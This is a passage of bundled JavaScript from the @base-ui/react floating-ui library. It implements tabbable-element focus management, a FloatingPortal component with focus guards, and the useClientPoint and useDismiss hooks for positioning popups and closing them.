    return !!summary && (element === summary || contains(summary, element));
  }
  function isFocusableCandidate(element) {
    const nodeName = element ? getNodeName(element) : "";
    return element != null && element.matches(CANDIDATE_SELECTOR) && (nodeName !== "summary" || element.parentElement != null && getNodeName(element.parentElement) === "details" && getDetailsSummary(element.parentElement) === element) && (nodeName !== "details" || getDetailsSummary(element) == null) && (nodeName !== "input" || element.type !== "hidden");
  }
  function isFocusableElement(element) {
    if (!isFocusableCandidate(element) || !element.isConnected || element.matches(":disabled")) {
      return false;
    }
    for (let current = element; current; current = getParentElement(current)) {
      const isAncestor = current !== element;
      const isSlot = getNodeName(current) === "slot";
      if (current.hasAttribute("inert")) {
        return false;
      }
      if (isAncestor && getNodeName(current) === "details" && !current.open && !isWithinOpenDetailsSummary(element, current) || current.hasAttribute("hidden") || !isSlot && !isVisibleInTabbableTree(current, isAncestor)) {
        return false;
      }
    }
    return true;
  }
  function isVisibleInTabbableTree(element, isAncestor) {
    const styles = getComputedStyle2(element);
    if (!isAncestor) {
      return isElementVisible(element, styles);
    }
    return styles.display !== "none";
  }
  function getTabIndex(element) {
    const tabIndex = element.tabIndex;
    if (tabIndex < 0) {
      const nodeName = getNodeName(element);
      if (nodeName === "details" || nodeName === "audio" || nodeName === "video" || isHTMLElement(element) && element.isContentEditable) {
        return 0;
      }
    }
    return tabIndex;
  }
  function getNamedRadioInput(element) {
    if (getNodeName(element) !== "input") {
      return null;
    }
    const input = element;
    return input.type === "radio" && input.name !== "" ? input : null;
  }
  function isTabbableRadio(element, candidates) {
    const input = getNamedRadioInput(element);
    if (!input) {
      return true;
    }
    const checkedRadio = candidates.find((candidate) => {
      const radio = getNamedRadioInput(candidate);
      return radio?.name === input.name && radio.form === input.form && radio.checked;
    });
    if (checkedRadio) {
      return checkedRadio === input;
    }
    return candidates.find((candidate) => {
      const radio = getNamedRadioInput(candidate);
      return radio?.name === input.name && radio.form === input.form;
    }) === input;
  }
  function getComposedChildren(container) {
    if (isHTMLElement(container) && getNodeName(container) === "slot") {
      const assignedElements = container.assignedElements({
        flatten: true
      });
      if (assignedElements.length > 0) {
        return assignedElements;
      }
    }
    if (isHTMLElement(container) && container.shadowRoot) {
      return Array.from(container.shadowRoot.children);
    }
    return Array.from(container.children);
  }
  function appendCandidates(container, list) {
    getComposedChildren(container).forEach((child) => {
      if (isFocusableCandidate(child)) {
        list.push(child);
      }
      appendCandidates(child, list);
    });
  }
  function appendMatchingElements(container, selector, list) {
    getComposedChildren(container).forEach((child) => {
      if (isHTMLElement(child) && child.matches(selector)) {
        list.push(child);
      }
      appendMatchingElements(child, selector, list);
    });
  }
  function focusable(container) {
    const candidates = [];
    appendCandidates(container, candidates);
    return candidates.filter(isFocusableElement);
  }
  function tabbable(container) {
    const candidates = focusable(container);
    return candidates.filter((element) => getTabIndex(element) >= 0 && isTabbableRadio(element, candidates));
  }
  function getTabbableIn(container, dir) {
    const list = tabbable(container);
    const len = list.length;
    if (len === 0) {
      return void 0;
    }
    const active = activeElement(ownerDocument(container));
    const index2 = list.indexOf(active);
    const nextIndex = index2 === -1 ? dir === 1 ? 0 : len - 1 : index2 + dir;
    return list[nextIndex];
  }
  function getNextTabbable(referenceElement) {
    return getTabbableIn(ownerDocument(referenceElement).body, 1) || referenceElement;
  }
  function getPreviousTabbable(referenceElement) {
    return getTabbableIn(ownerDocument(referenceElement).body, -1) || referenceElement;
  }
  function isOutsideEvent(event, container) {
    const containerElement = container || event.currentTarget;
    const relatedTarget = event.relatedTarget;
    return !relatedTarget || !contains(containerElement, relatedTarget);
  }
  function disableFocusInside(container) {
    const tabbableElements = tabbable(container);
    tabbableElements.forEach((element) => {
      element.dataset.tabindex = element.getAttribute("tabindex") || "";
      element.setAttribute("tabindex", "-1");
    });
  }
  function enableFocusInside(container) {
    const elements = [];
    appendMatchingElements(container, "[data-tabindex]", elements);
    elements.forEach((element) => {
      const tabindex = element.dataset.tabindex;
      delete element.dataset.tabindex;
      if (tabindex) {
        element.setAttribute("tabindex", tabindex);
      } else {
        element.removeAttribute("tabindex");
      }
    });
  }

  // node_modules/@base-ui/react/floating-ui-react/utils/nodes.mjs
  function getNodeChildren(nodes, id, onlyOpenChildren = true) {
    const directChildren = nodes.filter((node) => node.parentId === id);
    return directChildren.flatMap((child) => [...!onlyOpenChildren || child.context?.open ? [child] : [], ...getNodeChildren(nodes, child.id, onlyOpenChildren)]);
  }

  // node_modules/@base-ui/react/floating-ui-react/utils/createAttribute.mjs
  function createAttribute(name) {
    return `data-base-ui-${name}`;
  }

  // node_modules/@base-ui/react/floating-ui-react/components/FloatingPortal.mjs
  var React15 = __toESM(require_react(), 1);
  var ReactDOM2 = __toESM(require_react_dom(), 1);

  // node_modules/@base-ui/react/internals/constants.mjs
  var DISABLED_TRANSITIONS_STYLE = {
    style: {
      transition: "none"
    }
  };
  var BASE_UI_SWIPE_IGNORE_ATTRIBUTE = "data-base-ui-swipe-ignore";
  var LEGACY_SWIPE_IGNORE_ATTRIBUTE = "data-swipe-ignore";
  var BASE_UI_SWIPE_IGNORE_SELECTOR = `[${BASE_UI_SWIPE_IGNORE_ATTRIBUTE}]`;
  var LEGACY_SWIPE_IGNORE_SELECTOR = `[${LEGACY_SWIPE_IGNORE_ATTRIBUTE}]`;
  var POPUP_COLLISION_AVOIDANCE = {
    fallbackAxisSide: "end"
  };
  var ownerVisuallyHidden = {
    clipPath: "inset(50%)",
    position: "fixed",
    top: 0,
    left: 0
  };

  // node_modules/@base-ui/react/floating-ui-react/components/FloatingPortal.mjs
  var import_jsx_runtime3 = __toESM(require_jsx_runtime(), 1);
  var PortalContext = /* @__PURE__ */ React15.createContext(null);
  if (true) PortalContext.displayName = "PortalContext";
  var usePortalContext = () => React15.useContext(PortalContext);
  var attr = createAttribute("portal");
  function useFloatingPortalNode(props = {}) {
    const {
      ref,
      container: containerProp,
      componentProps = EMPTY_OBJECT,
      elementProps
    } = props;
    const uniqueId = useId();
    const portalContext = usePortalContext();
    const parentPortalNode = portalContext?.portalNode;
    const [containerElement, setContainerElement] = React15.useState(null);
    const [portalNode, setPortalNode] = React15.useState(null);
    const setPortalNodeRef = useStableCallback((node) => {
      if (node !== null) {
        setPortalNode(node);
      }
    });
    const containerRef = React15.useRef(null);
    useIsoLayoutEffect(() => {
      if (containerProp === null) {
        if (containerRef.current) {
          containerRef.current = null;
          setPortalNode(null);
          setContainerElement(null);
        }
        return;
      }
      if (uniqueId == null) {
        return;
      }
      const resolvedContainer = (containerProp && (isNode(containerProp) ? containerProp : containerProp.current)) ?? parentPortalNode ?? document.body;
      if (resolvedContainer == null) {
        if (containerRef.current) {
          containerRef.current = null;
          setPortalNode(null);
          setContainerElement(null);
        }
        return;
      }
      if (containerRef.current !== resolvedContainer) {
        containerRef.current = resolvedContainer;
        setPortalNode(null);
        setContainerElement(resolvedContainer);
      }
    }, [containerProp, parentPortalNode, uniqueId]);
    const portalElement = useRenderElement("div", componentProps, {
      ref: [ref, setPortalNodeRef],
      props: [{
        id: uniqueId,
        [attr]: ""
      }, elementProps]
    });
    const portalSubtree = containerElement && portalElement ? /* @__PURE__ */ ReactDOM2.createPortal(portalElement, containerElement) : null;
    return {
      portalNode,
      portalSubtree
    };
  }
  var FloatingPortal = /* @__PURE__ */ React15.forwardRef(function FloatingPortal2(componentProps, forwardedRef) {
    const {
      render,
      className,
      style,
      children,
      container,
      renderGuards,
      ...elementProps
    } = componentProps;
    const {
      portalNode,
      portalSubtree
    } = useFloatingPortalNode({
      container,
      ref: forwardedRef,
      componentProps,
      elementProps
    });
    const beforeOutsideRef = React15.useRef(null);
    const afterOutsideRef = React15.useRef(null);
    const beforeInsideRef = React15.useRef(null);
    const afterInsideRef = React15.useRef(null);
    const [focusManagerState, setFocusManagerState] = React15.useState(null);
    const focusInsideDisabledRef = React15.useRef(false);
    const modal = focusManagerState?.modal;
    const open = focusManagerState?.open;
    const shouldRenderGuards = typeof renderGuards === "boolean" ? renderGuards : !!focusManagerState && !focusManagerState.modal && focusManagerState.open && !!portalNode;
    React15.useEffect(() => {
      if (!portalNode || modal) {
        return void 0;
      }
      function onFocus(event) {
        if (portalNode && event.relatedTarget && isOutsideEvent(event)) {
          if (event.type === "focusin") {
            if (focusInsideDisabledRef.current) {
              enableFocusInside(portalNode);
              focusInsideDisabledRef.current = false;
            }
          } else {
            disableFocusInside(portalNode);
            focusInsideDisabledRef.current = true;
          }
        }
      }
      return mergeCleanups(addEventListener(portalNode, "focusin", onFocus, true), addEventListener(portalNode, "focusout", onFocus, true));
    }, [portalNode, modal]);
    useIsoLayoutEffect(() => {
      if (!portalNode || open !== true || !focusInsideDisabledRef.current) {
        return;
      }
      enableFocusInside(portalNode);
      focusInsideDisabledRef.current = false;
    }, [open, portalNode]);
    const portalContextValue = React15.useMemo(() => ({
      beforeOutsideRef,
      afterOutsideRef,
      beforeInsideRef,
      afterInsideRef,
      portalNode,
      setFocusManagerState
    }), [portalNode]);
    return /* @__PURE__ */ (0, import_jsx_runtime3.jsxs)(React15.Fragment, {
      children: [portalSubtree, /* @__PURE__ */ (0, import_jsx_runtime3.jsxs)(PortalContext.Provider, {
        value: portalContextValue,
        children: [shouldRenderGuards && portalNode && /* @__PURE__ */ (0, import_jsx_runtime3.jsx)(FocusGuard, {
          "data-type": "outside",
          ref: beforeOutsideRef,
          onFocus: (event) => {
            if (isOutsideEvent(event, portalNode)) {
              beforeInsideRef.current?.focus();
            } else {
              const domReference = focusManagerState ? focusManagerState.domReference : null;
              const prevTabbable = getPreviousTabbable(domReference);
              prevTabbable?.focus();
            }
          }
        }), shouldRenderGuards && portalNode && /* @__PURE__ */ (0, import_jsx_runtime3.jsx)("span", {
          "aria-owns": portalNode.id,
          style: ownerVisuallyHidden
        }), portalNode && /* @__PURE__ */ ReactDOM2.createPortal(children, portalNode), shouldRenderGuards && portalNode && /* @__PURE__ */ (0, import_jsx_runtime3.jsx)(FocusGuard, {
          "data-type": "outside",
          ref: afterOutsideRef,
          onFocus: (event) => {
            if (isOutsideEvent(event, portalNode)) {
              afterInsideRef.current?.focus();
            } else {
              const domReference = focusManagerState ? focusManagerState.domReference : null;
              const nextTabbable = getNextTabbable(domReference);
              nextTabbable?.focus();
              if (focusManagerState?.closeOnFocusOut) {
                focusManagerState?.onOpenChange(false, createChangeEventDetails(reason_parts_exports.focusOut, event.nativeEvent));
              }
            }
          }
        })]
      })]
    });
  });
  if (true) FloatingPortal.displayName = "FloatingPortal";

  // node_modules/@base-ui/react/floating-ui-react/components/FloatingTree.mjs
  var React16 = __toESM(require_react(), 1);

  // node_modules/@base-ui/react/floating-ui-react/utils/createEventEmitter.mjs
  function createEventEmitter() {
    const map = /* @__PURE__ */ new Map();
    return {
      emit(event, data) {
        map.get(event)?.forEach((listener) => listener(data));
      },
      on(event, listener) {
        if (!map.has(event)) {
          map.set(event, /* @__PURE__ */ new Set());
        }
        map.get(event).add(listener);
      },
      off(event, listener) {
        map.get(event)?.delete(listener);
      }
    };
  }

  // node_modules/@base-ui/react/floating-ui-react/components/FloatingTree.mjs
  var import_jsx_runtime4 = __toESM(require_jsx_runtime(), 1);
  var FloatingNodeContext = /* @__PURE__ */ React16.createContext(null);
  if (true) FloatingNodeContext.displayName = "FloatingNodeContext";
  var FloatingTreeContext = /* @__PURE__ */ React16.createContext(null);
  if (true) FloatingTreeContext.displayName = "FloatingTreeContext";
  var useFloatingParentNodeId = () => React16.useContext(FloatingNodeContext)?.id || null;
  var useFloatingTree = (externalTree) => {
    const contextTree = React16.useContext(FloatingTreeContext);
    return externalTree ?? contextTree;
  };

  // node_modules/@base-ui/react/floating-ui-react/hooks/useClientPoint.mjs
  var React17 = __toESM(require_react(), 1);
  function createVirtualElement(domElement, data) {
    let offsetX = null;
    let offsetY = null;
    let isAutoUpdateEvent = false;
    return {
      contextElement: domElement || void 0,
      getBoundingClientRect() {
        const domRect = domElement?.getBoundingClientRect() || {
          width: 0,
          height: 0,
          x: 0,
          y: 0
        };
        const isXAxis = data.axis === "x" || data.axis === "both";
        const isYAxis = data.axis === "y" || data.axis === "both";
        const canTrackCursorOnAutoUpdate = ["mouseenter", "mousemove"].includes(data.dataRef.current.openEvent?.type || "") && data.pointerType !== "touch";
        let width = domRect.width;
        let height = domRect.height;
        let x = domRect.x;
        let y = domRect.y;
        if (offsetX == null && data.x && isXAxis) {
          offsetX = domRect.x - data.x;
        }
        if (offsetY == null && data.y && isYAxis) {
          offsetY = domRect.y - data.y;
        }
        x -= offsetX || 0;
        y -= offsetY || 0;
        width = 0;
        height = 0;
        if (!isAutoUpdateEvent || canTrackCursorOnAutoUpdate) {
          width = data.axis === "y" ? domRect.width : 0;
          height = data.axis === "x" ? domRect.height : 0;
          x = isXAxis && data.x != null ? data.x : x;
          y = isYAxis && data.y != null ? data.y : y;
        } else if (isAutoUpdateEvent && !canTrackCursorOnAutoUpdate) {
          height = data.axis === "x" ? domRect.height : height;
          width = data.axis === "y" ? domRect.width : width;
        }
        isAutoUpdateEvent = true;
        return {
          width,
          height,
          x,
          y,
          top: y,
          right: x + width,
          bottom: y + height,
          left: x
        };
      }
    };
  }
  function isMouseBasedEvent(event) {
    return event != null && event.clientX != null;
  }
  function useClientPoint(context, props = {}) {
    const {
      enabled = true,
      axis = "both"
    } = props;
    const store2 = "rootStore" in context ? context.rootStore : context;
    const open = store2.useState("open");
    const floating = store2.useState("floatingElement");
    const domReference = store2.useState("domReferenceElement");
    const dataRef = store2.context.dataRef;
    const initialRef = React17.useRef(false);
    const cleanupListenerRef = React17.useRef(null);
    const [pointerType, setPointerType] = React17.useState();
    const [reactive, setReactive] = React17.useState([]);
    const resetReference = useStableCallback((reference2) => {
      store2.set("positionReference", reference2);
    });
    const setReference = useStableCallback((newX, newY, referenceElement) => {
      if (initialRef.current) {
        return;
      }
      if (dataRef.current.openEvent && !isMouseBasedEvent(dataRef.current.openEvent)) {
        return;
      }
      store2.set("positionReference", createVirtualElement(referenceElement ?? domReference, {
        x: newX,
        y: newY,
        axis,
        dataRef,
        pointerType
      }));
    });
    const handleReferenceEnterOrMove = useStableCallback((event) => {
      if (!open) {
        setReference(event.clientX, event.clientY, event.currentTarget);
      } else if (!cleanupListenerRef.current) {
        setReference(event.clientX, event.clientY, event.currentTarget);
        setReactive([]);
      }
    });
    const openCheck = isMouseLikePointerType(pointerType) ? floating : open;
    React17.useEffect(() => {
      if (!enabled) {
        resetReference(domReference);
        return void 0;
      }
      if (!openCheck) {
        return void 0;
      }
      function cleanupListener() {
        cleanupListenerRef.current?.();
        cleanupListenerRef.current = null;
      }
      const win = getWindow(floating);
      function handleMouseMove(event) {
        const target = getTarget(event);
        if (!contains(floating, target)) {
          setReference(event.clientX, event.clientY);
        } else {
          cleanupListener();
        }
      }
      if (!dataRef.current.openEvent || isMouseBasedEvent(dataRef.current.openEvent)) {
        cleanupListenerRef.current = addEventListener(win, "mousemove", handleMouseMove);
      } else {
        resetReference(domReference);
      }
      return cleanupListener;
    }, [openCheck, enabled, floating, dataRef, domReference, store2, setReference, resetReference, reactive]);
    React17.useEffect(() => () => {
      store2.set("positionReference", null);
    }, [store2]);
    React17.useEffect(() => {
      if (enabled && !floating) {
        initialRef.current = false;
      }
    }, [enabled, floating]);
    React17.useEffect(() => {
      if (!enabled && open) {
        initialRef.current = true;
      }
    }, [enabled, open]);
    const reference = React17.useMemo(() => {
      function setPointerTypeRef(event) {
        setPointerType(event.pointerType);
      }
      return {
        onPointerDown: setPointerTypeRef,
        onPointerEnter: setPointerTypeRef,
        onMouseMove: handleReferenceEnterOrMove,
        onMouseEnter: handleReferenceEnterOrMove
      };
    }, [handleReferenceEnterOrMove]);
    return React17.useMemo(() => enabled ? {
      reference,
      trigger: reference
    } : {}, [enabled, reference]);
  }

  // node_modules/@base-ui/react/floating-ui-react/hooks/useDismiss.mjs
  var React18 = __toESM(require_react(), 1);
  function alwaysFalse() {
    return false;
  }
  function normalizeProp(normalizable) {
    return {
      escapeKey: typeof normalizable === "boolean" ? normalizable : normalizable?.escapeKey ?? false,
      outsidePress: typeof normalizable === "boolean" ? normalizable : normalizable?.outsidePress ?? true
    };
  }
  function useDismiss(context, props = {}) {
    const {
      enabled = true,
      escapeKey: escapeKey2 = true,
      outsidePress: outsidePressProp = true,
      outsidePressEvent = "sloppy",
      referencePress = alwaysFalse,
      bubbles,
      externalTree
    } = props;
    const store2 = "rootStore" in context ? context.rootStore : context;
    const open = store2.useState("open");
    const floatingElement = store2.useState("floatingElement");
    const {
      dataRef
    } = store2.context;
    const tree = useFloatingTree(externalTree);
    const outsidePressFn = useStableCallback(typeof outsidePressProp === "function" ? outsidePressProp : () => false);
    const outsidePress2 = typeof outsidePressProp === "function" ? outsidePressFn : outsidePressProp;
    const outsidePressEnabled = outsidePress2 !== false;
    const getOutsidePressEventProp = useStableCallback(() => outsidePressEvent);
    const {
      escapeKey: escapeKeyBubbles,
      outsidePress: outsidePressBubbles
    } = normalizeProp(bubbles);
    const pressStartedInsideRef = React18.useRef(false);
    const pressStartPreventedRef = React18.useRef(false);
    const suppressNextOutsideClickRef = React18.useRef(false);
    const isComposingRef = React18.useRef(false);
    const currentPointerTypeRef = React18.useRef("");
    const touchStateRef = React18.useRef(null);
    const cancelDismissOnEndTimeout = useTimeout();
    const clearInsideReactTreeTimeout = useTimeout();
    const clearInsideReactTree = useStableCallback(() => {
      clearInsideReactTreeTimeout.clear();
      dataRef.current.insideReactTree = false;
    });
    const hasBlockingChild = useStableCallback((bubbleKey) => {
      const nodeId = dataRef.current.floatingContext?.nodeId;
      const children = tree ? getNodeChildren(tree.nodesRef.current, nodeId) : [];
      return children.some((child) => child.context?.open && !child.context.dataRef.current[bubbleKey]);
    });
    const isEventWithinOwnElements = useStableCallback((event) => {
      return isEventTargetWithin(event, store2.select("floatingElement")) || isEventTargetWithin(event, store2.select("domReferenceElement"));
    });
    const closeOnReferencePress = useStableCallback((event) => {
      if (!referencePress()) {
        return;
      }
      store2.setOpen(false, createChangeEventDetails(reason_parts_exports.triggerPress, event.nativeEvent));
    });
    const closeOnEscapeKeyDown = useStableCallback((event) => {
      if (!open || !enabled || !escapeKey2 || event.key !== "Escape") {
        return;
      }
      if (isComposingRef.current) {
        return;
      }
      if (!escapeKeyBubbles && hasBlockingChild("__escapeKeyBubbles")) {
        return;
      }
      const native = isReactEvent(event) ? event.nativeEvent : event;
      const eventDetails = createChangeEventDetails(reason_parts_exports.escapeKey, native);
      store2.setOpen(false, eventDetails);
      if (!eventDetails.isCanceled) {
        event.preventDefault();
      }
      if (!escapeKeyBubbles && !eventDetails.isPropagationAllowed) {
        event.stopPropagation();
      }
    });
    const markInsideReactTree = useStableCallback(() => {
      dataRef.current.insideReactTree = true;
      clearInsideReactTreeTimeout.start(0, clearInsideReactTree);
    });
    const markPressStartedInsideReactTree = useStableCallback((event) => {
      if (!open || !enabled || event.button !== 0) {
        return;
      }
      const target = getTarget(event.nativeEvent);
      if (!contains(store2.select("floatingElement"), target)) {
        return;
      }
      if (!pressStartedInsideRef.current) {
        pressStartedInsideRef.current = true;
        pressStartPreventedRef.current = false;
      }
    });
    const markInsidePressStartPrevented = useStableCallback((event) => {
      if (!open || !enabled) {
        return;
      }
      if (!(event.defaultPrevented || event.nativeEvent.defaultPrevented)) {
        return;
      }
      if (pressStartedInsideRef.current) {
        pressStartPreventedRef.current = true;
      }
    });
    React18.useEffect(() => {
      if (!open || !enabled) {
        return void 0;
      }
      dataRef.current.__escapeKeyBubbles = escapeKeyBubbles;
      dataRef.current.__outsidePressBubbles = outsidePressBubbles;
      const compositionTimeout = new Timeout();
      const preventedPressSuppressionTimeout = new Timeout();
      function handleCompositionStart() {
        compositionTimeout.clear();
        isComposingRef.current = true;
      }
      function handleCompositionEnd() {
        compositionTimeout.start(
          // 0ms or 1ms don't work in Safari. 5ms appears to consistently work.
          // Only apply to WebKit for the test to remain 0ms.
          parts_exports.engine.webkit ? 5 : 0,
          () => {
            isComposingRef.current = false;
          }
        );
      }
      function suppressImmediateOutsideClickAfterPreventedStart() {
        suppressNextOutsideClickRef.current = true;
        preventedPressSuppressionTimeout.start(0, () => {
          suppressNextOutsideClickRef.current = false;
        });
      }
      function resetPressStartState() {
        pressStartedInsideRef.current = false;
        pressStartPreventedRef.current = false;
      }
      function getOutsidePressEvent() {
        const type = currentPointerTypeRef.current;
        const computedType = type === "pen" || !type ? "mouse" : type;
        const outsidePressEventValue = getOutsidePressEventProp();
        const resolved = typeof outsidePressEventValue === "function" ? outsidePressEventValue() : outsidePressEventValue;
        if (typeof resolved === "string") {
          return resolved;
        }
        return resolved[computedType];
      }
      function shouldIgnoreEvent(event) {
        const computedOutsidePressEvent = getOutsidePressEvent();
        return computedOutsidePressEvent === "intentional" && event.type !== "click" || computedOutsidePressEvent === "sloppy" && event.type === "click";
      }
      function isEventWithinFloatingTree(event) {
        const nodeId = dataRef.current.floatingContext?.nodeId;
        const targetIsInsideChildren = tree && getNodeChildren(tree.nodesRef.current, nodeId).some((node) => isEventTargetWithin(event, node.context?.elements.floating));
        return isEventWithinOwnElements(event) || targetIsInsideChildren;
      }
      function closeOnPressOutside(event) {
        if (shouldIgnoreEvent(event)) {
          if (event.type !== "click" && !isEventWithinOwnElements(event)) {
            preventedPressSuppressionTimeout.clear();
            suppressNextOutsideClickRef.current = false;
          }
          clearInsideReactTree();
          return;
        }
        if (dataRef.current.insideReactTree) {
          clearInsideReactTree();
          return;
        }
        const target = getTarget(event);
        const inertSelector = `[${createAttribute("inert")}]`;
        const targetRoot = isElement(target) ? target.getRootNode() : null;
        const markers = Array.from((isShadowRoot(targetRoot) ? targetRoot : ownerDocument(store2.select("floatingElement"))).querySelectorAll(inertSelector));
        const triggers = store2.context.triggerElements;
        if (target && (triggers.hasElement(target) || triggers.hasMatchingElement((trigger) => contains(trigger, target)))) {
          return;
        }
        let targetRootAncestor = isElement(target) ? target : null;
        while (targetRootAncestor && !isLastTraversableNode(targetRootAncestor)) {
          const nextParent = getParentNode(targetRootAncestor);
          if (isLastTraversableNode(nextParent) || !isElement(nextParent)) {
            break;
          }
          targetRootAncestor = nextParent;
        }
        if (markers.length && isElement(target) && !isRootElement(target) && // Clicked on a direct ancestor (e.g. FloatingOverlay).
        !contains(target, store2.select("floatingElement")) && // If the target root element contains none of the markers, then the
        // element was injected after the floating element rendered.
        markers.every((marker) => !contains(targetRootAncestor, marker))) {
          return;
        }
        if (isHTMLElement(target) && !("touches" in event)) {
          const lastTraversableNode = isLastTraversableNode(target);
          const style = getComputedStyle2(target);
          const scrollRe = /auto|scroll/;
          const isScrollableX = lastTraversableNode || scrollRe.test(style.overflowX);
          const isScrollableY = lastTraversableNode || scrollRe.test(style.overflowY);
          const canScrollX = isScrollableX && target.clientWidth > 0 && target.scrollWidth > target.clientWidth;
          const canScrollY = isScrollableY && target.clientHeight > 0 && target.scrollHeight > target.clientHeight;
          const isRTL3 = style.direction === "rtl";
          const pressedVerticalScrollbar = canScrollY && (isRTL3 ? event.offsetX <= target.offsetWidth - target.clientWidth : event.offsetX > target.clientWidth);
          const pressedHorizontalScrollbar = canScrollX && event.offsetY > target.clientHeight;
          if (pressedVerticalScrollbar || pressedHorizontalScrollbar) {
            return;
          }
        }
        if (isEventWithinFloatingTree(event)) {
          return;
        }
        if (getOutsidePressEvent() === "intentional" && suppressNextOutsideClickRef.current) {
          preventedPressSuppressionTimeout.clear();
          suppressNextOutsideClickRef.current = false;
          return;
        }
        if (typeof outsidePress2 === "function" && !outsidePress2(event)) {
          return;
        }
        if (hasBlockingChild("__outsidePressBubbles")) {
          return;
        }
        store2.setOpen(false, createChangeEventDetails(reason_parts_exports.outsidePress, event));
        clearInsideReactTree();
      }
      function handlePointerDown(event) {
        if (getOutsidePressEvent() !== "sloppy" || event.pointerType === "touch" || !store2.select("open") || !enabled || isEventWithinOwnElements(event)) {
          return;
        }
        closeOnPressOutside(event);
      }
      function handleTouchStart(event) {
        if (getOutsidePressEvent() !== "sloppy" || !store2.select("open") || !enabled || isEventWithinOwnElements(event)) {
          return;
        }
        const touch = event.touches[0];
        if (touch) {
          touchStateRef.current = {
            startTime: Date.now(),
            startX: touch.clientX,
            startY: touch.clientY,
            dismissOnTouchEnd: false,
            dismissOnMouseDown: true
          };
          cancelDismissOnEndTimeout.start(1e3, () => {
            if (touchStateRef.current) {
              touchStateRef.current.dismissOnTouchEnd = false;
              touchStateRef.current.dismissOnMouseDown = false;
            }
          });
        }
      }
      function addTargetEventListenerOnce(event, listener) {
        const target = getTarget(event);
        if (!target) {
          return;
        }
        const unsubscribe2 = addEventListener(target, event.type, () => {
          listener(event);
          unsubscribe2();
        });
      }
      function handleTouchStartCapture(event) {
        currentPointerTypeRef.current = "touch";
        addTargetEventListenerOnce(event, handleTouchStart);
      }
      function closeOnPressOutsideCapture(event) {
        cancelDismissOnEndTimeout.clear();
        if (event.type === "pointerdown") {
          currentPointerTypeRef.current = event.pointerType;
        }
        if (event.type === "mousedown" && touchStateRef.current && !touchStateRef.current.dismissOnMouseDown) {
          return;
        }
        addTargetEventListenerOnce(event, (targetEvent) => {
          if (targetEvent.type === "pointerdown") {
            handlePointerDown(targetEvent);
          } else {
            closeOnPressOutside(targetEvent);
          }
        });
      }
      function handlePressEndCapture(event) {
        if (!pressStartedInsideRef.current) {
          return;
        }
        const pressStartedInsideDefaultPrevented = pressStartPreventedRef.current;
        resetPressStartState();
        if (getOutsidePressEvent() !== "intentional") {
          return;
        }
        if (event.type === "pointercancel") {
          if (pressStartedInsideDefaultPrevented) {
            suppressImmediateOutsideClickAfterPreventedStart();
          }
          return;
        }
        if (isEventWithinFloatingTree(event)) {
          return;
        }
        if (pressStartedInsideDefaultPrevented) {
          suppressImmediateOutsideClickAfterPreventedStart();
          return;
        }
        if (typeof outsidePress2 === "function" && !outsidePress2(event)) {
          return;
        }
        preventedPressSuppressionTimeout.clear();
        suppressNextOutsideClickRef.current = true;
        clearInsideReactTree();
      }
      function handleTouchMove(event) {
        if (getOutsidePressEvent() !== "sloppy" || !touchStateRef.current || isEventWithinOwnElements(event)) {
          return;
        }
        const touch = event.touches[0];
        if (!touch) {
          return;
        }
        const deltaX = Math.abs(touch.clientX - touchStateRef.current.startX);
        const deltaY = Math.abs(touch.clientY - touchStateRef.current.startY);
        const distance = Math.sqrt(deltaX * deltaX + deltaY * deltaY);
        if (distance > 5) {
          touchStateRef.current.dismissOnTouchEnd = true;
        }
        if (distance > 10) {
          closeOnPressOutside(event);
          cancelDismissOnEndTimeout.clear();
          touchStateRef.current = null;
        }
      }
      function handleTouchMoveCapture(event) {
        addTargetEventListenerOnce(event, handleTouchMove);
      }
      function handleTouchEnd(event) {
        if (getOutsidePressEvent() !== "sloppy" || !touchStateRef.current || isEventWithinOwnElements(event)) {
          return;
        }
        if (touchStateRef.current.dismissOnTouchEnd) {
          closeOnPressOutside(event);
        }
        cancelDismissOnEndTimeout.clear();
        touchStateRef.current = null;
      }
      function handleTouchEndCapture(event) {
        addTargetEventListenerOnce(event, handleTouchEnd);
      }
      const doc = ownerDocument(floatingElement);
      const unsubscribe = mergeCleanups(escapeKey2 && mergeCleanups(addEventListener(doc, "keydown", closeOnEscapeKeyDown), addEventListener(doc, "compositionstart", handleCompositionStart), addEventListener(doc, "compositionend", handleCompositionEnd)), outsidePressEnabled && mergeCleanups(addEventListener(doc, "click", closeOnPressOutsideCapture, true), addEventListener(doc, "pointerdown", closeOnPressOutsideCapture, true), addEventListener(doc, "pointerup", handlePressEndCapture, true), addEventListener(doc, "pointercancel", handlePressEndCapture, true), addEventListener(doc, "mousedown", closeOnPressOutsideCapture, true), addEventListener(doc, "mouseup", handlePressEndCapture, true), addEventListener(doc, "touchstart", handleTouchStartCapture, true), addEventListener(doc, "touchmove", handleTouchMoveCapture, true), addEventListener(doc, "touchend", handleTouchEndCapture, true)));
      return () => {
        unsubscribe();
        compositionTimeout.clear();
        preventedPressSuppressionTimeout.clear();
        resetPressStartState();
        suppressNextOutsideClickRef.current = false;
      };
    }, [dataRef, floatingElement, escapeKey2, outsidePressEnabled, outsidePress2, open, enabled, escapeKeyBubbles, outsidePressBubbles, closeOnEscapeKeyDown, clearInsideReactTree, getOutsidePressEventProp, hasBlockingChild, isEventWithinOwnElements, tree, store2, cancelDismissOnEndTimeout]);
    React18.useEffect(clearInsideReactTree, [outsidePress2, clearInsideReactTree]);
    const reference = React18.useMemo(() => ({
      onKeyDown: closeOnEscapeKeyDown,
      onPointerDown: closeOnReferencePress,
      onClick: closeOnReferencePress
    }), [closeOnEscapeKeyDown, closeOnReferencePress]);
    const floating = React18.useMemo(() => ({
      onKeyDown: closeOnEscapeKeyDown,
      // `onMouseDown` may be blocked if `event.preventDefault()` is called in
      // `onPointerDown`, such as with <NumberField.ScrubArea>.
      // See https://github.com/mui/base-ui/pull/3379
      onPointerDown: markInsidePressStartPrevented,
      onMouseDown: markInsidePressStartPrevented,
      onClickCapture: markInsideReactTree,
      onMouseDownCapture(event) {
        markInsideReactTree();
        markPressStartedInsideReactTree(event);
      },
      onPointerDownCapture(event) {
        markInsideReactTree();
        markPressStartedInsideReactTree(event);
      },
      onMouseUpCapture: markInsideReactTree,
      onTouchEndCapture: markInsideReactTree,
      onTouchMoveCapture: markInsideReactTree
    }), [closeOnEscapeKeyDown, markInsideReactTree, markPressStartedInsideReactTree, markInsidePressStartPrevented]);
    return React18.useMemo(() => enabled ? {
      reference,
      floating,
      trigger: reference
    } : {}, [enabled, reference, floating]);
  }

  // node_modules/@base-ui/react/floating-ui-react/hooks/useFloating.mjs
  var React25 = __toESM(require_react(), 1);

  // node_modules/@floating-ui/core/dist/floating-ui.core.mjs
  function computeCoordsFromPlacement(_ref, placement, rtl) {
    let {
      reference,
      floating
